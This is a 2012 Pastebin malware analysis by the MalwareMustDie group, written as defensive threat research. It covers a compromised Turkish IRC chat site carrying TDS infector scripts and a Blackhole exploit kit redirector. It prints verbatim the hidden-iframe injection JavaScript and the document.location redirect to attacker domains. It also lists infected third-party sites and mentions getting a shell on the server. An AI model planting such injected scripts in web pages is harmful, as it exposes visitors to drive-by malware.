API tools faq
paste
Advertisement
MalwareMustDie

#MMD!! irc.muhabbetturk.net loaded with TDS Infector + BHEK2

MalwareMustDie
Nov 9th, 2012
1,563
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.55 KB | None | 0 0
raw download clone embed print report
  1. =================================
  2. #MalwareMustDie!!
  3. 31.210.155.181 / http://irc.muhabbetturk.net/
  4. loaded with infectors
  5. Case 1 = 4 files (TDS Malware Infector)
  6. http://fohfynly.ru/count2.php
  7. Case 2 = 1 file (BHEK 2 js.js redirector to PluginDetect)
  8. http://q.e-tecinnovation.co.uk/links/created_danger.php
  9.  
  10. #Hint from Hulk_crusader for case 2
  11. Digged up case 1 by @unixfreaxjp
  12. Sat Nov 10 01:13:44 JST 2012
  13.  
  14. !! IMPORTANT!!
  15. Curently major infection of the case 1 ITW!!!
  16. PoC:
  17.  
  18. // infection spreads detectionc checking....
  19.  
  20. DORK THIS ===> " 'src = 'http://fohfynly.ru/count2.php"
  21.  
  22. About 11,700 results (0.30 seconds) ↓↓
  23.  
  24. Online Test of Usul-e-Fiqh-1
  25. www.qoitrat.org/test/Usul-e-Fiqh-1/default.asp - Cached
  26. (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
  27. Online Test of Shrh-e-Luma-2
  28. www.qoitrat.org/test/Shrh-e-Luma-2/default.asp - Cached
  29. (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
  30. SR Presentation Folders - Top Class Signs and Printing
  31. www.topclassprinting.com/...php/.../SR-Presentation-Folders.html?...
  32. This site may harm your computer.
  33. createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; ...
  34. Signs and Printing | Forgot your Username?
  35. www.topclassprinting.com/index.php/Lost-user-name.html
  36. This site may harm your computer.
  37. (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
  38. H2Solution
  39. www.h2-solution.com/index.asp?action=team - Cached
  40. (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
  41. Feedback - Gitarattan International Business School
  42. gitarattan.edu.in/feedback.php - Cached
  43. Feedback Form <script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; ...
  44. Ferrari San Antonio, New and Pre-owned Ferrari and Maserati ...
  45. https://heroesandfantasies.com/ - Cached
  46. (function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ..
  47.  
  48. 1 2 3 4 5 6 7 8 9 10 Next
  49.  
  50.  
  51.  
  52. ==================================
  53.  
  54. <<<<<<<<<<<< P o C >>>>>>>>>>>>
  55.  
  56. //hint
  57.  
  58. See http://irc.muhabbetturk.net/
  59.  
  60. ------------------------
  61.  
  62. //making it short, got the shell.....
  63.  
  64. $ ls -alF
  65. total 532
  66. drwxr-xr-x 8 xxxxx xxxxx 1024 Nov 10 00:17 ./
  67. drwxrwxrwx 6 xxxxx xxxxx 512 Nov 10 00:17 ../
  68. drwxr-xr-x 3 xxxxx xxxxx 512 Nov 10 00:17 _autoindex/
  69. -rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 cnt.php*
  70. -rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 count.php*
  71. -rwxr--r-- 1 xxxxx xxxxx 2550 Nov 3 01:08 dagitim.html*
  72. -rwxr--r-- 1 xxxxx xxxxx 105043 Aug 18 2011 flaxchat.cab*
  73. -rwxr--r-- 1 xxxxx xxxxx 169843 May 25 03:30 flaxchat.jar*
  74. drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 images/
  75. drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 nrJDKNYN/
  76. -rwxr--r-- 1 xxxxx xxxxx 2011 Nov 10 00:10 oyun.html*
  77. drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 photos/
  78. -rwxr--r-- 1 xxxxx xxxxx 3268 Nov 3 01:08 postinfo.html*
  79. -rwxr--r-- 1 xxxxx xxxxx 633 Aug 18 2011 setting.txt*
  80. drwxr-xr-x 7 xxxxx xxxxx 512 Nov 10 00:17 skins/
  81. -rwxr--r-- 1 xxxxx xxxxx 2524 Nov 3 01:08 sohbet.html*
  82. drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 sounds/
  83. -rwxr--r-- 1 xxxxx xxxxx 997 Nov 3 01:08 titresim.js*
  84. -rwxr--r-- 1 xxxxx xxxxx 170138 Aug 18 2011 xxflaxchat.jar*
  85.  
  86. ---------------------------------------
  87.  
  88. //scp flush'em out for plastic surgery...
  89. :
  90. --00:13:41-- http://irc.muhabbetturk.net/skins/mirc/?NA
  91. => `irc.muhabbetturk.net/skins/mirc/index.html@NA'
  92. Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
  93. HTTP request sent, awaiting response... 200 OK
  94. Length: 2,573 (2.5K) [text/html]
  95.  
  96. --00:13:42-- http://irc.muhabbetturk.net/skins/mirc/?MD
  97. => `irc.muhabbetturk.net/skins/mirc/index.html@MD'
  98. Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
  99. HTTP request sent, awaiting response... 200 OK
  100. Length: 2,573 (2.5K) [text/html]
  101.  
  102. --00:13:43-- http://irc.muhabbetturk.net/skins/mirc/?SD
  103. => `irc.muhabbetturk.net/skins/mirc/index.html@SD'
  104. Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
  105. HTTP request sent, awaiting response... 200 OK
  106. Length: 2,573 (2.5K) [text/html]
  107. :
  108.  
  109. ===========================
  110. // infector files...
  111.  
  112. 1) Infectors to the TDS Malware CNC
  113. domains http://fohfynly.ru/count2.php
  114. URL: http://fohfynly.ru/count2.php
  115.  
  116. ===========================
  117.  
  118.  
  119. =================================================
  120. $ cat /dagitim.html (TDS Malware Infection scheme...)
  121. =================================================
  122. <script language="JavaScript1.2">
  123. function shake(n) {
  124. if (parent.moveBy) {
  125. for (i = 10; i > 0; i--) {
  126. for (j = n; j > 0; j--) {
  127. parent.moveBy(0,i);
  128. parent.moveBy(i,0);
  129. parent.moveBy(0,-i);
  130. parent.moveBy(-i,0);
  131. }
  132. }
  133. }
  134. }
  135. </script>
  136. <applet name="Flaxchat" code="flaxchat.FlaxChat.class"
  137. archive ="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt
  138. .jar,flaxgammon.jar"
  139. width ="100%"
  140. height ="400"
  141. codebase = "http://irc.muhabbetturk.net">
  142. <param name="CABBASE" value="flaxchat.cab">
  143. <param name="ident" value="flaxchat">
  144. <param name="fullname" value="Flaxchat">
  145. <param name="nickname" value="">
  146. <param name="Channel1" value="#sohbet,#oyun">
  147. <p>Java uygulamas² kurulu de≡il.Java yuklemek icin <a href="http://www.flaxchat.
  148. com/?getjava">chat applet</a></p><!--d1752c--><script type="text/javascript" lan
  149. guage="javascript" >
  150. :
  151. blah...
  152.  
  153. ---------------------------------------------
  154.  
  155. //simulate....
  156.  
  157. [2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Status: 200, Referrer: None
  158. )[2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Content-type: text/html, MD
  159. 5: 12154dbf36908011e17fcbd7a93b007b)
  160. [2012-11-10 00:14:17] <applet archive="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar" code="flaxchat.FlaxChat.class" codebase="http://irc.muhabbetturk.net" height="400" name="Flaxchat" width="100%">
  161. <param name="CABBASE" value="flaxchat.cab"></param>
  162. <param name="ident" value="flaxchat"></param>
  163. <param name="fullname" value="Flaxchat"></param>
  164. <param name="nickname" value=""></param>
  165. <param name="Channel1" value="#sohbet,#oyun"></param>
  166. <p>Java uygulamasý kurulu deđil.Java yuklemek icin <a href="http://www.flaxchat.com/?getjava">chat applet</a></p><!--d1752c--><script language="javascript" type="text/javascript"> (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('&lt;div id=\'mira\'&gt;&lt;/div&gt;'); document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->
  167.  
  168. </applet>
  169. [2012-11-10 00:14:17] [Navigator URL Translation] flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar --> http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
  170. [2012-11-10 00:14:18] [HTTP] URL: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar (Status: 404, Referrer: http://irc.muhabbetturk.net/dagitim.html)
  171. [2012-11-10 00:14:18] FileNotFoundError: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
  172. [2012-11-10 00:14:18] Unhandled script language: javascript1.2
  173. [2012-11-10 00:14:18] <param name="CABBASE" value="flaxchat.cab"></param>
  174. [2012-11-10 00:14:18] <param name="ident" value="flaxchat"></param>
  175. [2012-11-10 00:14:18] <param name="fullname" value="Flaxchat"></param>
  176. [2012-11-10 00:14:18] <param name="nickname" value=""></param>
  177. [2012-11-10 00:14:18] <param name="Channel1" value="#sohbet,#oyun"></param>
  178. [2012-11-10 00:14:33] <iframe src="http://fohfynly.ru/count2.php"></iframe> <=============BINGO!!!!!!!!!!!!!!!
  179. [2012-11-10 00:14:33] [iframe redirection] http://irc.muhabbetturk.net/dagitim.html -> http://fohfynly.ru/count2.php <=============BINGO!!!!!!!!!!!!!!!
  180.  
  181. ---------------------------------------------
  182.  
  183. // Infection #1 found : http://fohfynly.ru/count2.php
  184. // checking....
  185.  
  186. --00:25:05-- http://fohfynly.ru/count2.php
  187. => `./sample'
  188. Resolving fohfynly.ru... failed: Unknown host.
  189.  
  190. //reference #1....
  191.  
  192. http://urlquery.net/report.php?id=91654
  193. URL http://fohfynly.ru/count2.php
  194. IP 78.96.77.179
  195. ASN AS6830 UPC Broadband Holding B.V.
  196. Location [Romania] Romania
  197. Report completed 2012-11-05 16:41:59 CET
  198. Status Report complete.
  199. urlQuery Alerts Detected a TDS URL pattern
  200.  
  201. //http requests....
  202.  
  203. GET /count2.php HTTP/1.1 HTTP/1.1 302
  204. Host: fohfynly.ru HTTP/1.1 302
  205.  
  206. GET /billing.php HTTP/1.1 HTTP/1.1 200 OK
  207. Host: na-igre.pp.ua Content-Type: text/html
  208.  
  209. GET /ga.js HTTP/1.1 HTTP/1.1 200 OK
  210. Host: www.google-ana Content-Type: text/javascript
  211. lytics.com
  212.  
  213. GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=885136485&utmhn=na-igre.pp.ua&utmcs=ISO-8859-1&utmsr= HTTP/1.1 200 OK
  214. 1176x885&utmvp=1176x761&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmhid=2033196436&utmr= Content-Type: image/gif
  215. -&utmp=%2Fbilling.php&utmac=UA-7382389-46&utmcc=__utma%3D119089686.1353519843.1352130089.1352130089.1352130089.1
  216. %3B%2B__utmz%3D119089686.1352130089.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1
  217. Host: www.google-analytics.com
  218.  
  219. GET /favicon.ico HTTP/1.1 HTTP/1.1 302 Found
  220. Host: na-igre.pp.ua Content-Type: text/html; charset=iso-8859-1
  221.  
  222. GET /error404/ HTTP/1.1 HTTP/1.1 200 OK
  223. Host: www.host1free.com Content-Type: text/html; charset=UTF-8 // currently unregistered domain....
  224.  
  225.  
  226. //elinks snaps...
  227.  
  228. # Error 404 - Page Not Found (p1 of 4) // currently unregistered domain....
  229. # Host1Free Banners Free Hosting
  230. host1free.com
  231. Sign-Up For Free Web Hosting! Login to Control Panel
  232. Free Web Hosting is Powered by HOST1PLUS
  233. * Free Hosting
  234. * Features
  235. * Affiliates
  236. * Forum / Support
  237. * Blog
  238. * Upgrades
  239. * Free VPS
  240. VPS Hosting
  241. Web Hosting
  242.  
  243. //reference #2
  244.  
  245. URL http://fohfynly.ru/count2.php
  246. IP 189.214.146.232
  247. ASN AS28554 Cablemas Telecomunicaciones SA de CV
  248. Location [Mexico] Mexico
  249. Report completed 2012-11-02 20:33:26 CET
  250. Status Report complete.
  251. urlQuery Alerts Detected a TDS URL pattern
  252.  
  253. // whois check...fohfynly.ru....
  254.  
  255. domain: FOHFYNLY.RU
  256. nserver: ns1.systeat.com.
  257. nserver: ns2.systeat.com.
  258. nserver: ns3.systeat.com.
  259. nserver: ns4.systeat.com.
  260. nserver: ns5.systeat.com.
  261. nserver: ns6.systeat.com.
  262. state: REGISTERED, NOT DELEGATED, UNVERIFIED
  263. person: Private Person
  264. registrar: REGGI-REG-RIPN
  265. admin-contact: http://www.webdrive.ru/webmail/
  266. created: 2012.11.01
  267. paid-till: 2013.11.01
  268. free-date: 2013.12.02
  269. source: TCI
  270.  
  271. Last updated on 2012.11.09 19:41:38 MSK <============== JUST CHANGED
  272.  
  273.  
  274.  
  275. =================================================
  276. $ cat /postinfo.html ; cat /sohbet.html ; cat /titresim.js
  277. (TDS Malware Infectors...)
  278. =================================================
  279. :
  280. <!--d1752c--><script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe');
  281. a.src = 'http://fohfynly.ru/count2.php'; <=================================#w000t!!! Bingo!!
  282. a.style.position = 'absolute';
  283. a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px';
  284. a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>');
  285. document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->
  286. :
  287. /*d1752c*/
  288. (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0';
  289. a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px';
  290. if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();
  291. /*/d1752c*/
  292.  
  293.  
  294. =================================================
  295. // infector files...
  296. 2) BHEK2 js.js Infecor...
  297.  
  298. See nrJDKNYN folder of: http://irc.muhabbetturk.net/
  299. $ cat /nrJDKNYN/js.js
  300. =================================================
  301.  
  302. document.location='http://q.e-tecinnovation.co.uk/links/created_danger.php';
  303.  
  304. //accessing... with or without you....NO! tor...
  305.  
  306. --01:09:02-- http://q.e-tecinnovation.co.uk/links/created_danger.php
  307. => `./sample'
  308. Resolving q.e-tecinnovation.co.uk... failed: Unknown host.
  309.  
  310. //reference... as per expected BHEK2.......
  311. URL http://q.e-tecinnovation.co.uk/links/created_danger.php
  312. IP 74.91.118.239
  313. ASN AS12182 Internap Network Services Corporation
  314. Location [United States] United States
  315. Report completed 2012-11-06 16:28:30 CET
  316. Status Report complete.
  317. urlQuery Alerts Detected BlackHole v2.0 exploit kit URL pattern
  318.  
  319. ====================
  320. #MalwareMustDie!
  321. Sat Nov 10 01:13:44 JST 2012
  322. *) This is a team work effort!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!